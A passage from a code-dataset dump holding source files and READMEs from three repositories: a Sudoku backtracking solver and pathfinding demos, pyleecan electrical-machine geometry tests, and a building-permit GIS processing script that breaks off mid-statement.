"text": "import time\r\n\r\nboard = [\r\n [0,0,0,0,0,0,0,0,1],\r\n [0,0,0,0,1,0,2,3,0],\r\n [0,0,8,4,3,0,0,0,7],\r\n [0,9,6,0,2,7,0,4,8],\r\n [0,0,0,0,0,9,0,0,0],\r\n [0,5,0,0,0,0,0,0,0],\r\n [0,0,4,0,0,5,0,0,0],\r\n [0,0,0,0,9,0,1,0,0],\r\n [9,8,2,7,0,0,0,0,0]\r\n]\r\n\r\n#board output\r\ndef output_sudoku(sudoku):\r\n for i in range(len(sudoku)):\r\n if i % 3 == 0 :\r\n print(\" - - - - - - - - - - - - - - \")\r\n for j in range(len(sudoku[1])):\r\n if j % 3 == 0:\r\n print(\" | \",end=\"\")\r\n if j == 8:\r\n print(str(sudoku[i][j])+\" | \")\r\n else:\r\n print(str(sudoku[i][j]) + \" \",end=\"\")\r\n\r\n#checking whether the value in x,y fulfills the sudoku rules\r\ndef check_rules(x,y,sudoku):\r\n value=sudoku[y][x]\r\n #checking if the value is already in the same row or column\r\n for i in range(len(sudoku)):\r\n if sudoku[y][i] == value and i != x:\r\n return False\r\n if sudoku[i][x] == value and i != y:\r\n return False\r\n #checking if the value is in the same box\r\n #finding the box\r\n xmin = x // 3\r\n ymin = y // 3\r\n for i in range(ymin * 3, ymin * 3 + 3):\r\n for j in range(xmin * 3, xmin * 3 + 3):\r\n if sudoku[i][j] == value and i != y and j != x:\r\n return False\r\n return True\r\n\r\n#if empty entry found, return the coordinates, if not return (-1,-1)\r\n#just have to look at the entries for j>=y\r\ndef find_empty(y,sudoku):\r\n for j in range(y, len(sudoku)):\r\n for i in range(len(sudoku)):\r\n if sudoku[j][i] == 0:\r\n return (i,j)\r\n return (-1,-1)\r\n\r\n#the backtracking solver\r\ndef backtracking_solver(sudoku):\r\n #instead of recursion, I used a stack\r\n stack = []\r\n #starting point (x,y)-coordinate\r\n pos=(0,0)\r\n pos = find_empty(pos[1],sudoku)\r\n #until there are zeros in the array\r\n while pos[0] != -1:\r\n #since it makes no sense to begin at 0\r\n sudoku[pos[1]][pos[0]] = 1\r\n value = 1\r\n #backtracking algo\r\n while not check_rules(pos[0],pos[1],sudoku):\r\n #if value == 9 and still no solution found, we want to go back in the list\r\n if value == 9:\r\n sudoku[pos[1]][pos[0]] = 0\r\n pos = stack.pop()\r\n #increase the popped value (backtracking algo)\r\n value = sudoku[pos[1]][pos[0]] + 1\r\n sudoku[pos[1]][pos[0]] = value\r\n #special case, if we grab a 9, we want to go back further\r\n if value > 9:\r\n sudoku[pos[1]][pos[0]] = 0\r\n pos = stack.pop()\r\n value = sudoku[pos[1]][pos[0]] + 1\r\n sudoku[pos[1]][pos[0]] = value\r\n else:\r\n #iterate from 1-8\r\n sudoku[pos[1]][pos[0]] += 1\r\n value = sudoku[pos[1]][pos[0]]\r\n #append the entry and look for the next zero\r\n stack.append(pos)\r\n pos = find_empty(pos[1],sudoku)\r\n\r\nstart_time = time.time()\r\nbacktracking_solver(board)\r\noutput_sudoku(board)\r\nprint(\"\\n\\n%s seconds\" % (time.time() - start_time))\r\n"
},
{
"alpha_fraction": 0.7582417726516724,
"alphanum_fraction": 0.7655677795410156,
"avg_line_length": 132.5,
"blob_id": "afc2dbbdc964bb902b1ed2506f440bdbfd3e80fa",
"content_id": "be7c38ed5cb88ee7392d74345abb1168990d74cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 2,
"path": "/sudoku_solver/README.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Sudoku Solver\r\nFor this project I implemented a Sudoku solver (for a 9x9 grid) with a non-recursive Backtracking algorithm (in C++ and Python). The plan is to extend this project in the future, by reading Sudokus with text recognition (OCR) into the data structure.\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4185585081577301,
"alphanum_fraction": 0.44456690549850464,
"avg_line_length": 29.075342178344727,
"blob_id": "a46fce245e512d24c542c41d8985bdd71c17044c",
"content_id": "0b42102d2c0e2de8b735a7cdeb4ec0c1160f7911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4537,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 146,
"path": "/sudoku_solver/sudoku.cpp",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "#include <iostream>\r\n#include <vector>\r\n#include <stack>\r\n\r\n\r\n//outputting the board\r\nvoid out_sudoku(const std::vector<std::vector<short>>& sudoku)\r\n{\r\n for (auto i = sudoku.begin(); i != sudoku.end(); ++i)\r\n {\r\n if (std::distance(sudoku.begin(), i) % 3 == 0)\r\n std::cout << \" - - - - - - - - - - - - - - \" << std::endl;\r\n\r\n for (auto j = i->begin(); j != i->end(); ++j)\r\n {\r\n if (std::distance(i->begin(), j) % 3 == 0)\r\n {\r\n std::cout << \" | \";\r\n }\r\n if (std::distance(i->begin(), j) == 8)\r\n {\r\n std::cout << *j << \" | \" << std::endl;\r\n }\r\n else\r\n {\r\n std::cout << *j << \" \";\r\n }\r\n }\r\n }\r\n std::cout << \" - - - - - - - - - - - - - - \" << std::endl; \r\n\r\n}\r\n\r\n//checks whether the new value at the position pair fullfills the sudoku rules\r\nbool check_rules(const std::pair<short, short>& pos, const std::vector<std::vector<short>>& sudoku) \r\n{\r\n short value = sudoku[pos.second][pos.first];\r\n //checking rows and columns\r\n for (short i = 0; i < sudoku.size(); i++) \r\n {\r\n if (sudoku[pos.second][i] == value && i != pos.first)\r\n {\r\n return false;\r\n }\r\n if (sudoku[i][pos.first] == value && i != pos.second)\r\n {\r\n return false;\r\n }\r\n }\r\n //checking the ''square''\r\n short xmin = pos.first / 3;\r\n short ymin = pos.second / 3;\r\n for (short i = ymin * 3; i < ymin * 3 + 3; i++)\r\n for (short j = xmin * 3; j < xmin * 3 + 3; j++)\r\n if (sudoku[i][j] == value && i != pos.second && j != pos.first)\r\n {\r\n return false;\r\n }\r\n return true;\r\n}\r\n\r\n\r\n\r\n//find the next empty entry in the board, return it's pos\r\n//return (-1,-1) if the board is already full\r\nstd::pair<short, short> find_empty(const std::vector<std::vector<short>>& sudoku) \r\n{\r\n for (auto i = sudoku.begin(); i != sudoku.end(); ++i)\r\n for (auto j = i->begin(); j != i->end(); ++j)\r\n if (*j == 0)\r\n {\r\n //returning j,i coordinates\r\n return std::make_pair(std::distance(i->begin(), j), std::distance(sudoku.begin(), i));\r\n }\r\n return { -1,-1 };\r\n}\r\n\r\n\r\n//the backtracking algo\r\nvoid solver(std::vector<std::vector<short>>& sudoku) \r\n{\r\n short value;\r\n //stack to avoid recursion\r\n std::stack<std::pair<short,short>> last_pos;\r\n //starting point\r\n std::pair<short, short> pos = { 0, 0 };\r\n pos = find_empty(sudoku);\r\n while (pos.second != -1) \r\n {\r\n //every new value is set to 1\r\n sudoku[pos.second][pos.first] = 1;\r\n value = 1;\r\n while (!check_rules(pos, sudoku)) \r\n {\r\n //if still no solution and val=9, go back in the stack, backtracking...\r\n if (value == 9) \r\n {\r\n sudoku[pos.second][pos.first] = 0;\r\n pos = last_pos.top();\r\n last_pos.pop();\r\n //increase the old value by one, backtracking...\r\n value = sudoku[pos.second][pos.first] + 1;\r\n sudoku[pos.second][pos.first] = value;\r\n //special case, if the previous val was already 9, go back further\r\n if (value > 9) \r\n {\r\n sudoku[pos.second][pos.first] = 0;\r\n pos = last_pos.top();\r\n last_pos.pop();\r\n value = sudoku[pos.second][pos.first] + 1;\r\n sudoku[pos.second][pos.first] = value;\r\n }\r\n }\r\n //iterating through 1-9, checking for a solution\r\n else \r\n {\r\n sudoku[pos.second][pos.first] += 1;\r\n value = sudoku[pos.second][pos.first];\r\n }\r\n }\r\n //adding the temporary solution to the stack and finding the next 0\r\n last_pos.push(pos);\r\n pos = find_empty(sudoku);\r\n }\r\n out_sudoku(sudoku);\r\n}\r\n\r\n\r\nint main(){\r\n std::vector<std::vector<short>> board = {\r\n 
{0,0,0,0,0,0,0,0,1},\r\n {0,0,0,0,1,0,2,3,0},\r\n {0,0,8,4,3,0,0,0,7},\r\n {0,9,6,0,2,7,0,4,8},\r\n {0,0,0,0,0,9,0,0,0},\r\n {0,5,0,0,0,0,0,0,0},\r\n {0,0,4,0,0,5,0,0,0},\r\n {0,0,0,0,9,0,1,0,0},\r\n {9,8,2,7,0,0,0,0,0}\r\n\r\n };\r\n //solver(board);\r\n out_sudoku(board);\r\n std::cout << \"The solution is:\" << std::endl;\r\n solver(board);\r\n}\r\n"
},
{
"alpha_fraction": 0.677647054195404,
"alphanum_fraction": 0.6820167899131775,
"avg_line_length": 28.16666603088379,
"blob_id": "6f5c90a0b88712a908ac4c9275b77bea53c413ec",
"content_id": "197a2db5e7b71b828cd2f69d19f42bf4fd81a25d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8925,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 306,
"path": "/pathfinding_algorithms/README.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Pathfinding Algorithms\nI implemented the A*, Dijkstra, Greedy Best First Search and the Breadth-First Search algorithm with a Pygame GUI (path_algos.py).\n\nIn this example, the Dijkstra algorithm can be seen. The orange node depicts the start point, the turquoise node the end point and black nodes correspond to an obstacle. The algorithm proceeds through the grid and marks visited nodes in light blue. Finally, the shortest path between the two nodes is highlighted in yellow.\n\n\n\n## Requirements\nPygame, key_c.png, mouse_button.png, right_button.png and spacebar.jpg\n\n## Instruction\nThe start and end nodes can be set through left clicks with the mouse at the grid GUI. After the first two clicks, obstacles can be drawn into the grid structure.\n\n\nThe user chooses between algorithms by clicking at the algorithm's name. By pressing the spacebar, the algorithm starts to work through the grid.\n\n\nNodes in the grid can be deleted with right clicks.\n\n\nTo clear the grid, press \"c\"\n\n\n\n## Algorithms\n### The Grid structure\nThe node class\n```\n#node structure for the grid (x,y). every node is connected with maximum 4 neighbors. stored in neighbors\n#diagonal connections are not allowed.\n#a spot also holds a color for the visualization\nclass Spot:\n\tdef __init__(self, row, col, width, total_rows):\n\t\tself.row = row\n\t\tself.col = col\n\t\tself.x = row * width\n\t\tself.y = col * width\n\t\t#unaccessed color = white\n\t\tself.color = WHITE\n\t\tself.neighbors = []\n\t\tself.width = width\n\t\tself.total_rows = total_rows\n\t\t#the color might changes after a certain step interval\n\t\tself.time_effekt = 0\n\n\tdef get_pos(self):\n\t\treturn self.row, self.col\n\n\tdef is_closed(self):\n\t\treturn self.color == RED\n\n\tdef is_open(self):\n\t\treturn self.color == GREEN\n\n\tdef is_barrier(self):\n\t\treturn self.color == BLACK\n\n\tdef is_start(self):\n\t\treturn self.color == ORANGE\n\n\tdef is_end(self):\n\t\treturn self.color == TURQUOISE\n\n\tdef reset(self):\n\t\tself.color = WHITE\n\n\tdef make_start(self):\n\t\tself.color = ORANGE\n\n\t#after 7 steps, change the color\n\tdef make_closed(self):\n\t\tself.color = RED\n\t\tself.time_effekt = 7\n\n\tdef make_open(self):\n\t\tself.color = GREEN\n\n\tdef make_barrier(self):\n\t\tself.color = BLACK\n\n\tdef check_barrier(self):\n\t\tif self.color == BLACK:\n\t\t\treturn True\n\n\tdef make_end(self):\n\t\tself.color = TURQUOISE\n\n\tdef make_path(self):\n\t\tself.color = YELLOW\n\n\tdef draw(self, win):\n\t\t#change the color after a certain step interval\n\t\tif self.time_effekt > 0 and self.is_closed():\n\t\t\tpygame.draw.rect(win, EFFECTCOLOR, (self.x, self.y, self.width, self.width))\n\t\t\tself.time_effekt += -1\n\t\telse:\n\t\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\n\n\t#assigns all the possible neighbors (max:D,U,R,L), barriers for example are not allowed to be a neighbor\n\tdef update_neighbors(self, grid):\n\t\tself.neighbors = []\n\t\t# can still move down is not a barrier\n\t\tif self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # DOWN\n\t\t\tself.neighbors.append(grid[self.row + 1][self.col])\n\t\t#(0,0) is the upper right corner\n\t\tif self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # UP\n\t\t\tself.neighbors.append(grid[self.row - 1][self.col])\n\t\t# number of rows=number of columns\n\t\tif self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # 
RIGHT\n\t\t\tself.neighbors.append(grid[self.row][self.col + 1])\n\n\t\tif self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # LEFT\n\t\t\tself.neighbors.append(grid[self.row][self.col - 1])\n\n\tdef __lt__(self, other):\n\t\treturn False\n ```\n\nAnd the grid initializer\n ```\n#data structure for the grid\ndef make_grid(rows, width):\n\tgrid = []\n\t#how large a button is going to be\n\tgap = width // rows\n\tfor i in range(rows):\n\t\tgrid.append([])\n\t\tfor j in range(rows):\n\t\t\tspot = Spot(i, j, gap, rows)\n\t\t\tgrid[i].append(spot)\n\treturn grid\n ```\n \n### A*\n```#A* algo\ndef algorithm(draw, grid, start, end):\n\t#to get a tie braker for equal fs\n\tcount = 0\n\t#to get the min element\n\topen_set = PriorityQueue()\n\topen_set.put((0, count, start))\n\t#dictionary to assign nodes to nodes to create the shortest path\n\tcame_from = {}\n\t#setting g and f scores to inf at the beginning, except for the start pos\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tg_score[start] = 0\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\n\t#manhattan dist\n\tf_score[start] = h(start.get_pos(), end.get_pos())\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t#get the minimum val node\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\t\t#shortest path found\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, start, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\n\t\tfor neighbor in current.neighbors:\n\t\t\t#updating the g_score for the neighbors\n\t\t\ttemp_g_score = g_score[current] + 1\n\t\t\t#if a neighbor has a new lower value, save the new val\n\t\t\tif temp_g_score < g_score[neighbor]:\n\t\t\t\tcame_from[neighbor] = current\n\t\t\t\tg_score[neighbor] = temp_g_score\n\t\t\t\t#manhattan dist + steps\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\n\t\t\t\tif neighbor not in open_set_hash:\n\t\t\t\t\tcount += 1\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\tdraw()\n\t\tif current != start:\n\t\t\tcurrent.make_closed()\n\treturn False\n ```\n\n### Dijkstra\n```\n#dij\ndef dijk(draw, grid, start, end):\n\t#to get a tie braker for equal fs\n\tcount = 0\n\t#to get the min element\n\topen_set = PriorityQueue()\n\topen_set.put((0, count, start))\n\t#dictionary to assign nodes to nodes to create the shortest path\n\tcame_from = {}\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tg_score[start] = 0\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t#get the minimum val node\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\t\t#shortest path found\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, start, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\t\t#if a neighbor has a new lower val, save it\n\t\tfor neighbor in current.neighbors:\n\t\t\ttemp_g_score = g_score[current] + 1\n\t\t\tif temp_g_score < g_score[neighbor]:\n\t\t\t\tcame_from[neighbor] = current\n\t\t\t\tg_score[neighbor] = temp_g_score\n\t\t\t\tif neighbor not in open_set_hash:\n\t\t\t\t\tcount += 1\n\t\t\t\t\topen_set.put((g_score[neighbor], count, neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\tdraw()\n\t\tif current != 
start:\n\t\t\tcurrent.make_closed()\n\n\treturn False\n```\n\n### Greedy Best First Search, with Manhattan dist\n```\ndef greedy(draw, grid, start, end):\n\t#to get the min element, x value as tie braker\n\topen_set = PriorityQueue()\n\topen_set.put((0, start.get_pos()[1], start))\n\t#dictionary to assign nodes to nodes to create the shortest path\n\tcame_from = {}\n\t#heuristic, manhattan dist\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tf_score[start] = h(start.get_pos(), end.get_pos())\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\t\t#get the minimum val node\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\t\t#shortest path found\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, start, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\n\t\tfor neighbor in current.neighbors:\n\t\t\t\t#add neighbor to the stack, if it hasn't been visited yet\n\t\t\t\tif neighbor not in open_set_hash and not neighbor.is_closed():\n\t\t\t\t\t# calculate the heuristics for the neighbors\n\t\t\t\t\tf_score[neighbor] = h(neighbor.get_pos(), end.get_pos())\n\t\t\t\t\tif current != start:\n\t\t\t\t\t\tcame_from[neighbor] = current\n\t\t\t\t\topen_set.put((f_score[neighbor], neighbor.get_pos()[1], neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\tdraw()\n\n\t\tif current != start:\n\t\t\tcurrent.make_closed()\n\n\treturn False\n```\n\n### BFS\n```\n# finds shortest path between 2 nodes of a graph using BFS\ndef bfs(draw, grid, start, end):\n\t# keep track of explored nodes\n\texplored = []\n\t# keep track of all the paths to be checked\n\tqueue = [[start]]\n\n\t# keeps looping until all possible paths have been checked\n\twhile queue:\n\t\t# pop the first path from the queue\n\t\tpath = queue.pop(0)\n\t\t# get the last node from the path\n\t\tnode = path[len(path)-1]\n\n\t\tif node not in explored:\n\t\t\tneighbours = node.neighbors\n\t\t\t# go through all neighbour nodes and build a new path\n\t\t\t# if it was never visited, mark it for the visualization\n\t\t\tfor neighbour in neighbours:\n\t\t\t\tif neighbour.color == WHITE:\n\t\t\t\t\tneighbour.make_closed()\n\t\t\t\tnew_path = list(path)\n\t\t\t\t#append the new element to the existing path\n\t\t\t\tnew_path.append(neighbour)\n\t\t\t\tqueue.append(new_path)\n\n\t\t\t\tif neighbour == end:\n\t\t\t\t\t#return new_path\n\t\t\t\t\tdraw_path(draw, new_path, start, end)\n\t\t\t\t\treturn None\n\t\t\t# mark node as explored\n\t\t\texplored.append(node)\n\t\tdraw()\n```\n"
}
] | 8 |
HugoBecuwe/pyleecan
|
https://github.com/HugoBecuwe/pyleecan
|
ba3d16cb77680c0f4b5c71e99c74210f4ea85e86
|
1ae19ca1777fc186431d9a35bb01332fb936f0b5
|
0131615d443dead0ad58a9fb3756635bd246b26c
|
refs/heads/master
| 2023-08-15T18:19:53.599865 | 2021-10-12T12:02:59 | 2021-10-12T12:02:59 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5413142442703247,
"alphanum_fraction": 0.5783994793891907,
"avg_line_length": 27.462963104248047,
"blob_id": "e8df7ee24f9c1e42422d180e506d2ceb7529d823",
"content_id": "fefd8ba3e7ed0511f13c75bf2798830b5b960d71",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1537,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 54,
"path": "/Tests/Methods/Machine/test_comp_periodicity.py",
"repo_name": "HugoBecuwe/pyleecan",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom os.path import join\n\nfrom pyleecan.Functions.load import load\nfrom pyleecan.definitions import DATA_DIR\n\nmachine_list = [\n [\"Toyota_Prius\", (4, True, 4, True)],\n [\"BMW_i3\", (6, True, 6, True)],\n [\"Protean_InWheel\", (8, False, 32, True)],\n [\"Tesla_S\", (2, False, 2, False)],\n [\"Audi_eTron\", (2, False, 2, False)],\n [\"Benchmark\", (1, True, 5, True)],\n [\"SCIM_001\", (1, True, 1, True)],\n [\"SCIM_006\", (2, True, 2, True)],\n [\"SPMSM_001\", (4, False, 4, True)],\n [\"SPMSM_003\", (1, True, 1, True)],\n [\"SPMSM_015\", (9, False, 9, True)],\n [\"SIPMSM_001\", (1, False, 2, True)],\n [\"SynRM_001\", (2, True, 2, True)],\n [\"LSRPM_001\", (4, False, 4, True)],\n]\n\n\[email protected]\[email protected](\"machine\", machine_list)\ndef test_comp_periodicity(machine):\n\n machine_obj = load(join(DATA_DIR, \"Machine\", machine[0] + \".json\"))\n\n # per_a, aper_a = machine_obj.comp_periodicity_spatial()\n\n # per_t, aper_t, _, _ = machine_obj.comp_periodicity_time()\n\n per_a, aper_a, per_t, aper_t = machine_obj.comp_periodicity()\n\n msg = (\n \"Wrong periodicity calculation for \"\n + machine_obj.name\n + \": \"\n + str((per_a, aper_a, per_t, aper_t))\n )\n assert (per_a, aper_a, per_t, aper_t) == machine[1], msg\n\n return (per_a, aper_a, per_t, aper_t)\n\n\n# To run it without pytest\nif __name__ == \"__main__\":\n\n per_tuple = test_comp_periodicity(machine_list[-1])\n\n for machine in machine_list:\n per_tuple = test_comp_periodicity(machine)\n"
},
{
"alpha_fraction": 0.5241530537605286,
"alphanum_fraction": 0.5373274683952332,
"avg_line_length": 32.914894104003906,
"blob_id": "cc63c29944c99cc18e6f6aadb01b3c1be9a6d3d8",
"content_id": "becb87e1a162ad30d40f65d2dc93c13bddc9fd3f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3188,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 94,
"path": "/pyleecan/Functions/Geometry/transform_hole_surf.py",
"repo_name": "HugoBecuwe/pyleecan",
"src_encoding": "UTF-8",
"text": "from numpy import pi, exp\nfrom ...Functions.labels import (\n update_RTS_index,\n decode_label,\n BOUNDARY_PROP_LAB,\n YSR_LAB,\n YSL_LAB,\n)\n\n\ndef transform_hole_surf(hole_surf_list, Zh, sym, alpha, delta, is_split=False):\n \"\"\"Take a list of surface for a single hole and apply the\n transformation (rotate, translate, duplicate)\n\n Parameters\n ----------\n surf_list : list\n List of the surface to edit (single hole)\n sym : int\n Symetry to apply 2 = half the machine (Default value = 1 => full machine)\n alpha : float\n Angle for rotation (Default value = 0) [rad]\n delta : complex\n Complex for translation (Default value = 0)\n is_stator : bool\n True if ventilation is on the stator and 0 on the rotor (Default value = True)\n is_split : bool\n When sym>1, call surf.split_line to cut the surfaces\n\n Returns\n -------\n surf_list: list\n A list of transformed surface\n \"\"\"\n\n assert Zh % sym == 0\n\n # Rotate/translate\n if alpha != 0 or delta != 0:\n for surf in hole_surf_list:\n surf.rotate(alpha)\n surf.translate(delta)\n\n # Duplicate to have Zh/sym all the hole surfaces\n surf_list = list()\n for ii in range(Zh // sym):\n for surf in hole_surf_list:\n new_surf = surf.copy()\n new_surf.rotate(ii * 2 * pi / Zh)\n # Update label like \"Rotor-0_HoleVoid_R0-T0-S0\"\n new_surf.label = update_RTS_index(label=new_surf.label, S_id=ii)\n surf_list.append(new_surf)\n\n # Split the surfaces for symmetry\n if is_split and sym > 1:\n # Add an extra surface for each cut (alpha0 > 0)\n for surf in hole_surf_list:\n last_surf = surf.copy()\n last_surf.rotate((ii + 1) * 2 * pi / Zh)\n # Update label like \"Rotor-0_HoleVoid_R0-T0-S0\"\n last_surf.label = update_RTS_index(label=last_surf.label, S_id=ii + 1)\n surf_list.append(last_surf)\n\n first_surf = surf.copy()\n first_surf.rotate((Zh - 1) * 2 * pi / Zh)\n # Update label like \"Rotor-0_HoleVoid_R0-T0-S0\"\n first_surf.label = update_RTS_index(label=first_surf.label, S_id=Zh - 1)\n surf_list.append(first_surf)\n\n cut_list = list()\n lam_label = decode_label(new_surf.label)[\"lam_label\"]\n for surf in surf_list:\n # Cut Ox axis\n top, _ = surf.split_line(\n 0,\n 100,\n is_join=True,\n prop_dict_join={BOUNDARY_PROP_LAB: lam_label + \"_\" + YSR_LAB},\n )\n if top is not None and sym > 2:\n # Cut O-\"sym angle\" axis\n _, bot = top.split_line(\n 0,\n 100 * exp(1j * 2 * pi / sym),\n is_join=True,\n prop_dict_join={BOUNDARY_PROP_LAB: lam_label + \"_\" + YSL_LAB},\n )\n if bot is not None:\n cut_list.append(bot)\n elif top is not None: # Half the machine => Only one cut required\n cut_list.append(top)\n surf_list = cut_list\n\n return surf_list\n"
}
] | 2 |
MSLADevServGIS/bp2
|
https://github.com/MSLADevServGIS/bp2
|
810497cf62322bc4824ee85b37f254950c295a86
|
17817ee17d4853fcbbd6843f489b675570fb95d6
|
4bfd6c8d305681e123b21c834ae746f2cee2faee
|
refs/heads/master
| 2021-01-13T02:52:10.492875 | 2017-02-13T23:12:55 | 2017-02-13T23:12:55 | 77,092,379 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5586915612220764,
"alphanum_fraction": 0.5625994801521301,
"avg_line_length": 34.6134033203125,
"blob_id": "77006edf51a1b1fa19c8056c89fda27d4164397e",
"content_id": "c2558056cdd5de18464b2da26568829b8cb4f1af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6909,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 194,
"path": "/testing.py",
"repo_name": "MSLADevServGIS/bp2",
"src_encoding": "UTF-8",
"text": "\"\"\"\npermits.py -- Building Permit Database Script\nAuthor: Garin Wally; April-July 2016\n\n--NEW--\n\"\"\"\n\nimport os\nfrom glob import glob\n\n\nimport defopt\nfrom usaddress import parse as addrparse\n\nimport aside\nimport dslw\nimport dslw.arcio\n\nos.chdir(r\"I:\\WallyG\\projects\\bp2\")\nimport app\n\n\n# =============================================================================\n# DATA PATHS\n\nparcels = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.Parcels\"\ncondos = r\"Database Connections\\gisrep.sde\\gisrep.SDE.Parcels\\gisrep.SDE.All_Condos\"\nannex = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.Annexations\"\nnhoods = r\"Database Connections\\gisrep.sde\\gisrep.SDE.AdministrativeArea\\gisrep.SDE.NH_Council_Boundaries\"\nufda = r\"I:\\ArcExplorer\\Data\\Planning_to_sde.gdb\\Mt_St_Plane\\UFDA_regions\"\naddrs = r\"I:\\ArcExplorer\\Data\\Structures\\Address.gdb\\AddrsFt\"\n\n\n# =============================================================================\n# DATA (No touching)\n\n# Path to database for storing copies from SDE, etc.\nSDE_DATA = \"data/sde_data.sqlite\"\n\n# Global srid to reproject to; QGIS-friendly\nSRID = 2256\ndata = [\n {\"path\": parcels, \"name\": \"parcels\"},\n {\"path\": condos, \"name\": \"condos\"}, # TODO: dissolve?\n {\"path\": annex, \"name\": \"annexations\"},\n {\"path\": nhoods, \"name\": \"nhoods\"},\n {\"path\": ufda, \"name\": \"ufda_regions\"},\n {\"path\": addrs, \"name\": \"addrs\"}\n ]\n# Names correlate with table names in .sql scripts\n\n\nclass Processor(object):\n def __init__(self, year):\n self.year = year\n # Set base directory\n self.base_dir = \"data/{year}\".format(year=year)\n # Get report file path\n self.city_rpts = [os.path.abspath(f).replace(\"\\\\\", \"/\") for f in\n glob(\"{base}/city_{year}.xlsx\".format(\n base=self.base_dir, year=self.year))]\n # Set db path\n self.db = os.path.join(self.base_dir, \"bp{year}.sqlite\".format(\n year=self.year))\n # Create db\n aside.nix.write(\"Create/Connect to db\")\n self.conn = dslw.SpatialDB(self.db, verbose=False)\n self.cur = self.conn.cursor()\n aside.nix.ok()\n\n def prepare_city(self):\n \"\"\"Get report by year, process, load into SQLite db.\n\n Args:\n year (int): the year to process.\n \"\"\"\n self.juris = \"City\"\n # Process; returns output path\n aside.nix.write(\"Process XLSX\")\n self.out_csv = app.processing.city(self.city_rpts[0])\n aside.nix.ok()\n # Get name (e.g. 
'city_2016_processed')\n self.table_name = os.path.basename(self.out_csv).split(\".\")[0]\n aside.nix.info(\"Table: \" + self.table_name)\n\n # Load csv to db\n aside.nix.write(\"Insert CSV\")\n dslw.csv2lite(self.conn, self.out_csv)\n aside.nix.ok()\n\n def spatialize(self):\n # Add notes column\n aside.nix.write(\"Spatialize permits\")\n self.cur.execute(\"ALTER TABLE {} ADD COLUMN notes TEXT\".format(\n self.table_name))\n # Backup\n clone_q = \"SELECT CloneTable('main', '{0}', '{0}_bk', 1)\"\n self.cur.execute(clone_q.format(self.table_name))\n # Attach spatial db\n self.cur.execute(\"ATTACH DATABASE '{}' AS sde_data;\".format(\n SDE_DATA))\n # Spatialize\n app.spatialize_script(self.conn, self.table_name, SRID)\n\n # Special detail for Townhome/Condo points or for when the parcel data\n # or address data hasn't been updated just yet.\n null_qry = \"SELECT address, geocode FROM {tbl} WHERE geometry IS NULL\"\n null_qry = null_qry.format(tbl=self.table_name)\n update_q = (\"UPDATE {tbl} \"\n \"SET notes = 'TH/C', \"\n \"geometry = (\"\n \" SELECT ST_Multi(geometry) \"\n \" FROM addrs a \"\n \" WHERE a.addnum = {addrnum} AND a.roadname = '{road}') \"\n \"WHERE geometry IS NULL AND geocode = '{geocode}'\")\n nulls = self.cur.execute(null_qry).fetchall()\n # Process only if the query returns non-None values\n if any([r[0] for r in nulls]):\n for row in nulls:\n # Parse each address into a tuple\n parsed = addrparse(row[0])\n # Convert the tuple into a dictionary (reverse)\n d = {v: k for k, v in dict(parsed).iteritems()}\n # Format the update statement using the parsed information\n update = update_q.format(\n tbl=self.table_name, addrnum=d[\"AddressNumber\"],\n 